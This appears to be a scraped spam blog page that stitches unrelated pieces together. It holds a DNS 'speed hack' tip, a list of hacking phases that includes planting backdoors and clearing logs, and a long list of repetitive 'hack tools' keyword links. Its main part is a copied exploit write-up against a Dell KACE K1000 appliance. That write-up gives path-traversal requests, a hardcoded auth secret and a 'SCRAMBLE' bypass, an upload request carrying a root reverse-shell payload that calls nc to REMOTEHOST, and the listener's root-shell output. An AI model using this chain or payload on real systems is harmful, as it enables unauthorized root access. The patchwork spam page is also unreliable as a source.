:
:

Powered by GetResponse email marketing software

Anyone Can Make Money Online

Why You Need To Read This Blog About "Anyone Can Make Money Online"

Wednesday, August 26, 2020

HOW TO BOOST UP BROWSING SPEED?

Internet speed is the most cared factor when you buy an internet connection. What if still, you face a slow speed browsing problem? No worries, as I came with a solution to this problem. I will let you know how to boost up browsing speed. It's very simple to follow.

SO, HOW TO BOOST UP BROWSING SPEED?

There can be many ways you can get a speedy browsing whether you use paid service or free hacks. I am going to share this free speed hack with you.

STEPS TO FOLLOW

  1. Navigate to Control Panel > Network and Internet Options > Network and Sharing Center.
  2. Now look for the active internet connection to which you're currently connected to.
  3. Open up Connection Properties of your active connection.
  4. Click on IPv4 and open its Properties.
  5. Here you will notice your DNS, you just need to change your DNS address with the following DNS.
    Preferred DNS server: 208.67.222.222
    Alternate DNS server: 208.67.220.220
  6. Once done, save it and no configure it for IPv6. Just change the IPv6 DNS with the following DNS.
    Preferred DNS server: 2620:0:ccc::2

    Alternate DNS server: 2620:0:CCD::2
  7. Finally, save and you're done with it.
That's all. You have successfully learned how to boost up browsing speed. Hope it will work for you. Enjoy speedy internet..!

More articles


PHASES OF HACKING

What is the process of hacking or phases of hacking?
Hacking is broken up into six phases:The more you get close to all phases,the more stealth will be your attack.

1-Reconnaissance-This is the primary phase of hacking where hacker tries to collect as much as information as possible about the target.It includes identifying the target,domain name registration records of the target, mail server records,DNS records.The tools that are widely used in the process is NMAP,Hping,Maltego, and Google Dorks.

2-Scanning-This makes up the base of hacking! This is where planning for attack actually begins! The tools used in this process are Nessus,Nexpose,and NMAP. After reconnaissance the attacker scans the target for services running,open ports,firewall detection,finding out vulnerabilities,operating system detection.

3-Gaining Access-In this process the attacker executes the attack based on vulnerabilities which were identified during scanning!  After the successful, he get access to the target network or enter in to the system.The primary tools that is used in this process is Metasploit.

4-Maintaining Access-It is the process where the hacker has already gained access in to a system. After gaining access the hacker, the hacker installs some backdoors in order to enter in to the system when he needs access in this owned system in future. Metasploit is the preffered toll in this process.

5-Clearning track or Covering track-To avoid getting traced and caught,hacker clears all the tracks by clearing all kinds of logs and deleted the uploaded backdoor and anything in this process related stuff which may later reflect his presence!

6-Reporting-Reporting is the last step of finishing the ethical hacking process.Here the Ethical Hacker compiles a report with his findings and the job that was done such as the tools used,the success rate,vulnerabilities found,and the exploit process.

More information


The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:
POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;
That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:
http://targethost/service/kbot_upload.php
This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);
            return;
        }

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:
    private static function calcTokenChecksum($filename, $machineId, $mac)
    {
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
     
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
                   'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
    }
The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksumcheck, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  
 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").


The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:
    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    <?php
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 
Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
    http://targethost/service/tmp/db.php
On our host:
    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:
Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1
That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:


Related links
  1. Pentest Tools Website Vulnerability
  2. Pentest Tools Windows
  3. Pentest Automation Tools
  4. Hacking Tools For Beginners
  5. Hack Tools Mac
  6. Hacker Tools 2019
  7. Best Hacking Tools 2020
  8. Pentest Tools For Windows
  9. Growth Hacker Tools
  10. Hack Tools Download
  11. Pentest Tools Framework
  12. Hak5 Tools
  13. Pentest Tools Alternative
  14. Hack Tools For Mac
  15. Pentest Tools For Mac
  16. Hacker Tools Mac
  17. Hacker Tools Mac
  18. Pentest Tools Kali Linux
  19. Pentest Tools Github
  20. What Is Hacking Tools
  21. Nsa Hack Tools Download
  22. Hack Tool Apk No Root
  23. Hacking Tools Mac
  24. New Hacker Tools
  25. Hacker Tools List
  26. Pentest Box Tools Download
  27. Easy Hack Tools
  28. Hacking Tools Online
  29. Underground Hacker Sites
  30. Hacking Tools Online
  31. Growth Hacker Tools
  32. Hacker Tools Hardware
  33. Pentest Reporting Tools
  34. Pentest Tools Tcp Port Scanner
  35. Hacking Tools For Windows 7
  36. Nsa Hack Tools
  37. Pentest Tools Website Vulnerability
  38. Hacker Tools For Mac
  39. Hacker Tools Online
  40. Hack Tools For Games
  41. Hacking Tools 2019
  42. Usb Pentest Tools
  43. Hack Tools For Windows
  44. Hacking Tools Name
  45. New Hacker Tools
  46. Hacking Tools Pc
  47. How To Make Hacking Tools
  48. Bluetooth Hacking Tools Kali
  49. Pentest Tools Apk
  50. Pentest Tools Find Subdomains
  51. Hacker Tools List
  52. Hacker Tools Mac
  53. Hack Apps
  54. Hacking Tools For Kali Linux
  55. Nsa Hack Tools
  56. Hacker Tools For Mac
  57. Hack Tools Github
  58. Tools 4 Hack
  59. Hacker Tool Kit
  60. Pentest Tools Url Fuzzer
  61. Pentest Tools For Ubuntu
  62. Pentest Tools Github
  63. Hack Tool Apk
  64. Black Hat Hacker Tools
  65. Hacker Tools Windows
  66. Physical Pentest Tools
  67. New Hacker Tools
  68. Hack Apps
  69. Hacking Tools Name
  70. Hacker Tools Software
  71. Pentest Tools Bluekeep
  72. Hack Tools Pc
  73. Best Hacking Tools 2019
  74. Hacker Tools List
  75. Pentest Tools Free
  76. Hacking Tools Download
  77. Termux Hacking Tools 2019
  78. Hack Tools 2019
  79. Tools 4 Hack
  80. Nsa Hack Tools
  81. Pentest Tools For Android
  82. Hacking Tools For Windows
  83. Hacking Tools For Windows 7
  84. Blackhat Hacker Tools
  85. Pentest Tools For Windows
  86. Github Hacking Tools
  87. Hack Tools For Windows
  88. Tools 4 Hack
  89. What Is Hacking Tools
  90. Pentest Tools Open Source
  91. Hack Tools For Mac
  92. Hacker Tools For Ios
  93. Pentest Tools Review
  94. Hack Tools For Ubuntu
  95. Hack Tools For Windows
  96. Hacker Tools Online
  97. Hack Tools Github
  98. Hack Tool Apk No Root
  99. What Is Hacking Tools
  100. Pentest Tools Github
  101. Hack Website Online Tool
  102. New Hacker Tools
  103. Hacking Tools
  104. Hack Tools For Ubuntu
  105. Pentest Tools Find Subdomains
  106. Hacking Tools For Windows Free Download
  107. Pentest Tools Bluekeep
  108. Pentest Tools Bluekeep
  109. Hacking Tools For Windows Free Download
  110. Hack Apps
  111. Hacking Tools 2020
  112. Tools For Hacker
  113. Pentest Tools Nmap
  114. Hacking Tools For Mac
  115. Hackers Toolbox
  116. Pentest Tools Kali Linux
  117. Hacking Tools Online
  118. Hacking Tools Download
  119. Hacker Tools Linux
  120. Hacking Tools For Windows Free Download
  121. Pentest Tools Open Source
  122. Hacking Tools Windows 10
  123. Hacker Tools Linux
  124. What Are Hacking Tools
  125. Hack Tools Github
  126. Hack Tools
  127. Nsa Hack Tools
  128. Hacker Tools For Mac
  129. Hack Tools Github
  130. Pentest Tools Subdomain
  131. Best Pentesting Tools 2018
  132. Pentest Automation Tools
  133. World No 1 Hacker Software
  134. Hacking Tools Name
  135. Tools For Hacker
  136. Hacking Tools Name
  137. Hack Apps
  138. Game Hacking
  139. Pentest Reporting Tools
  140. Tools Used For Hacking
  141. Hack Tool Apk
  142. Hack Tools Mac
  143. Hacker
  144. Pentest Tools Github
  145. Pentest Tools Bluekeep
  146. Hacker Tools Apk
  147. What Are Hacking Tools
  148. Github Hacking Tools
  149. Install Pentest Tools Ubuntu
  150. Best Hacking Tools 2020
  151. Pentest Tools Nmap
  152. Usb Pentest Tools
  153. What Are Hacking Tools
  154. Free Pentest Tools For Windows
  155. Pentest Tools For Mac
  156. Best Hacking Tools 2019